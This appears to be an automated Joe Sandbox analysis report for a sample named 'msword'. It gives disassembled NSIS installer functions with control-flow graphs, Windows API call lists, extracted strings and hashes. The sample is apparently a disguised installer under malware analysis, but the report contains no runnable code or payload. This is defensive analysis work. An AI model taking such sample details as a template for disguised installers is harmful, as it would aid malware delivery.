                                                                            • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                                            • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                                            • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8
                                                                            Function 00405479 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 345windowstringCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                                            • ShowWindow.USER32(?), ref: 004054D2
                                                                            • DestroyWindow.USER32 ref: 004054E6
                                                                            • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                                            • GetDlgItem.USER32(?,?), ref: 00405523
                                                                            • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                                            • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                                            • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                                            • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                                            • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                                            • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                                            • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                                            • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                                            • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                                            • EnableWindow.USER32(?,?), ref: 00405757
                                                                            • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                                            • EnableMenuItem.USER32(00000000), ref: 00405774
                                                                            • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                                            • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                                            • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                                            • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                                            • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                            • String ID: @rD
                                                                            • API String ID: 3282139019-3814967855
                                                                            • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                                            • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                                            • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E
                                                                            Function 004015A0 Relevance: 56.4, APIs: 15, Strings: 17, Instructions: 351sleepfilewindowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                                            APIs
                                                                            • PostQuitMessage.USER32(00000000), ref: 00401648
                                                                            • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                                            • SetForegroundWindow.USER32(?), ref: 004016CB
                                                                            • ShowWindow.USER32(?), ref: 00401753
                                                                            • ShowWindow.USER32(?), ref: 00401767
                                                                            • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                                            • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                                            • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                                            • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                                            • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                                            • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                                            • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                                            • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                                            Strings
                                                                            • Rename on reboot: %s, xrefs: 00401943
                                                                            • Rename: %s, xrefs: 004018F8
                                                                            • Sleep(%d), xrefs: 0040169D
                                                                            • detailprint: %s, xrefs: 00401679
                                                                            • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                                            • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                                            • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                                            • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                                            • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                                            • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                                            • BringToFront, xrefs: 004016BD
                                                                            • Call: %d, xrefs: 0040165A
                                                                            • SetFileAttributes failed., xrefs: 004017A1
                                                                            • Rename failed: %s, xrefs: 0040194B
                                                                            • Aborting: "%s", xrefs: 0040161D
                                                                            • CreateDirectory: "%s" created, xrefs: 00401849
                                                                            • Jump: %d, xrefs: 00401602
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                                            • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                                            • API String ID: 2872004960-3619442763
                                                                            • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction ID: b6b48939bc8a7188504c618ab7841b31fdd5898bf24c808f75461ec369738802
                                                                            • Opcode Fuzzy Hash: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
                                                                            • Instruction Fuzzy Hash: 0AB1F471A00204ABDB10BF61DD46DAE3B69EF44314B21817FF946B21E1DA7D4E40CAAE
                                                                            Function 0040592C Relevance: 45.7, APIs: 15, Strings: 11, Instructions: 233stringregistrylibraryCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 426 40592c-405944 call 4062fc 429 405946-405956 call 405f51 426->429 430 405958-405990 call 405ed3 426->430 438 4059b3-4059dc call 403e95 call 40677e 429->438 435 405992-4059a3 call 405ed3 430->435 436 4059a8-4059ae lstrcatW 430->436 435->436 436->438 444 405a70-405a78 call 40677e 438->444 445 4059e2-4059e7 438->445 451 405a86-405a8d 444->451 452 405a7a-405a81 call 406805 444->452 445->444 446 4059ed-405a15 call 405ed3 445->446 446->444 453 405a17-405a1b 446->453 455 405aa6-405acb LoadImageW 451->455 456 405a8f-405a95 451->456 452->451 460 405a1d-405a2c call 405d06 453->460 461 405a2f-405a3b lstrlenW 453->461 458 405ad1-405b13 RegisterClassW 455->458 459 405b66-405b6e call 40141d 455->459 456->455 457 405a97-405a9c call 403e74 456->457 457->455 465 405c35 458->465 466 405b19-405b61 SystemParametersInfoW CreateWindowExW 458->466 478 405b70-405b73 459->478 479 405b78-405b83 call 403e95 459->479 460->461 462 405a63-405a6b call 406722 call 406009 461->462 463 405a3d-405a4b lstrcmpiW 461->463 462->444 463->462 470 405a4d-405a57 GetFileAttributesW 463->470 469 405c37-405c3e 465->469 466->459 475 405a59-405a5b 470->475 476 405a5d-405a5e call 406751 470->476 475->462 475->476 476->462 478->469 484 405b89-405ba6 ShowWindow LoadLibraryW 479->484 485 405c0c-405c0d call 405047 479->485 487 405ba8-405bad LoadLibraryW 484->487 488 405baf-405bc1 GetClassInfoW 484->488 491 405c12-405c14 485->491 487->488 489 405bc3-405bd3 GetClassInfoW RegisterClassW 488->489 490 405bd9-405bfc DialogBoxParamW call 40141d 488->490 489->490 495 405c01-405c0a call 403c68 490->495 493 405c16-405c1c 491->493 494 405c2e-405c30 call 40141d 491->494 493->478 496 405c22-405c29 call 40141d 493->496 494->465 495->469 496->478
                                                                            APIs
                                                                              • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                                              • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                                              • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                                            • lstrcatW.KERNEL32(004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0,-00000002,00000000,004D70C8,00403AC1,?), ref: 004059AE
                                                                            • lstrlenW.KERNEL32(00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006,004C30A0), ref: 00405A30
                                                                            • lstrcmpiW.KERNEL32(00462538,.exe,00462540,?,?,?,00462540,00000000,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000), ref: 00405A43
                                                                            • GetFileAttributesW.KERNEL32(00462540), ref: 00405A4E
                                                                              • Part of subcall function 00405F51: wsprintfW.USER32 ref: 00405F5E
                                                                            • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004C70A8), ref: 00405AB7
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405B0A
                                                                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00405B22
                                                                            • CreateWindowExW.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00405B5B
                                                                              • Part of subcall function 00403E95: SetWindowTextW.USER32(00000000,0046ADC0), ref: 00403F30
                                                                            • ShowWindow.USER32(00000005,00000000), ref: 00405B91
                                                                            • LoadLibraryW.KERNELBASE(RichEd20), ref: 00405BA2
                                                                            • LoadLibraryW.KERNEL32(RichEd32), ref: 00405BAD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit20A,0046AD60), ref: 00405BBD
                                                                            • GetClassInfoW.USER32(00000000,RichEdit,0046AD60), ref: 00405BCA
                                                                            • RegisterClassW.USER32(0046AD60), ref: 00405BD3
                                                                            • DialogBoxParamW.USER32(?,00000000,00405479,00000000), ref: 00405BF2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: ClassLoad$InfoLibraryWindow$Register$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemTextlstrcatlstrcmpilstrlenwsprintf
                                                                            • String ID: .DEFAULT\Control Panel\International$.exe$@%F$@rD$B%F$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                            • API String ID: 608394941-1650083594
                                                                            • Opcode ID: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction ID: 271ce27004ef92612bfc9362a6cc74883a37054a4c8cca7c49d128c059fded9a
                                                                            • Opcode Fuzzy Hash: 18be7924d3bcca259bbbf180237d25193f30e5c9112311b2c349bb590eb249de
                                                                            • Instruction Fuzzy Hash: 5E71A370604B04AED721AB65EE85F2736ACEB44749F00053FF945B22E2D7B89D418F6E
                                                                            Function 00401A1F Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 185stringtimeCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            APIs
                                                                              • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                              • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                            • lstrcatW.KERNEL32(00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401A76
                                                                            • CompareFileTime.KERNEL32(-00000014,?,TargetedRejectAccomplishComicsEngagementRendered,TargetedRejectAccomplishComicsEngagementRendered,00000000,00000000,TargetedRejectAccomplishComicsEngagementRendered,004CB0B0,00000000,00000000), ref: 00401AA0
                                                                              • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                              • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                              • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                              • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                              • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSendlstrlen$lstrcat$CompareFileTextTimeWindowlstrcpynwvsprintf
                                                                            • String ID: File: error creating "%s"$File: error, user abort$File: error, user cancel$File: error, user retry$File: overwriteflag=%d, allowskipfilesflag=%d, name="%s"$File: skipped: "%s" (overwriteflag=%d)$File: wrote %d to "%s"$TargetedRejectAccomplishComicsEngagementRendered
                                                                            • API String ID: 4286501637-1929300520
                                                                            • Opcode ID: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction ID: fe683e2e252f9e2189d7cf48164ff2fe6631720e8c40e43e96375682ff159270
                                                                            • Opcode Fuzzy Hash: b6a2df31382c61c88927ef82d5f6ae0aba2303a4f2552ab8741c3bf9876e390d
                                                                            • Instruction Fuzzy Hash: 9D510871901114BADF10BBB1CD46EAE3A68DF05369F21413FF416B10D2EB7C5A518AAE
                                                                            Function 00403587 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 587 403587-4035d5 GetTickCount GetModuleFileNameW call 405e50 590 4035e1-40360f call 406009 call 406751 call 406009 GetFileSize 587->590 591 4035d7-4035dc 587->591 599 403615 590->599 600 4036fc-40370a call 4032d2 590->600 592 4037b6-4037ba 591->592 602 40361a-403631 599->602 606 403710-403713 600->606 607 4037c5-4037ca 600->607 604 403633 602->604 605 403635-403637 call 403336 602->605 604->605 611 40363c-40363e 605->611 609 403715-40372d call 403368 call 403336 606->609 610 40373f-403769 GlobalAlloc call 403368 call 40337f 606->610 607->592 609->607 637 403733-403739 609->637 610->607 635 40376b-40377c 610->635 613 403644-40364b 611->613 614 4037bd-4037c4 call 4032d2 611->614 619 4036c7-4036cb 613->619 620 40364d-403661 call 405e0c 613->620 614->607 623 4036d5-4036db 619->623 624 4036cd-4036d4 call 4032d2 619->624 620->623 634 403663-40366a 620->634 631 4036ea-4036f4 623->631 632 4036dd-4036e7 call 407281 623->632 624->623 631->602 636 4036fa 631->636 632->631 634->623 640 40366c-403673 634->640 641 403784-403787 635->641 642 40377e 635->642 636->600 637->607 637->610 640->623 643 403675-40367c 640->643 644 40378a-403792 641->644 642->641 643->623 645 40367e-403685 643->645 644->644 646 403794-4037af SetFilePointer call 405e0c 644->646 645->623 647 403687-4036a7 645->647 650 4037b4 646->650 647->607 649 4036ad-4036b1 647->649 651 4036b3-4036b7 649->651 652 4036b9-4036c1 649->652 650->592 651->636 651->652 652->623 653 4036c3-4036c5 652->653 653->623
                                                                            APIs
                                                                            • GetTickCount.KERNEL32 ref: 00403598
                                                                            • GetModuleFileNameW.KERNEL32(00000000,004DF0D8,00002004,?,?,?,00000000,00403A47,?), ref: 004035B4
                                                                              • Part of subcall function 00405E50: GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                                              • Part of subcall function 00405E50: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                                            • GetFileSize.KERNEL32(00000000,00000000,004E30E0,00000000,004CF0B8,004CF0B8,004DF0D8,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00403600
                                                                            Strings
                                                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004037C5
                                                                            • Inst, xrefs: 0040366C
                                                                            • soft, xrefs: 00403675
                                                                            • Error launching installer, xrefs: 004035D7
                                                                            • Null, xrefs: 0040367E
                                                                            Memory Dump Source
                                                                            • Source File: 0000000E.00000002.1969136933.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 0000000E.00000002.1969046534.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000040B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969278177.0000000000461000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                            • Associated: 0000000E.00000002.1969432159.00000000004F4000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_14_2_400000_msword.jbxd
                                                                            Similarity
                                                                            • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                            • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                            • API String ID: 4283519449-527102705
                                                                            • Opcode ID: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction ID: 97831ba7e8e922ff386f77eab0e0d18630bd2de4bbb47cca7d976ce2c46b30f6
                                                                            • Opcode Fuzzy Hash: 120a85709c4a4315a44e2654504c88cd7b3d990096a9d7006e83d60a3a2719f2
                                                                            • Instruction Fuzzy Hash: 3151D5B1900204AFDB219F65CD85B9E7EB8AB14756F10803FE605B72D1D77D9E808B9C
                                                                            Function 0040337F Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 166fileCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
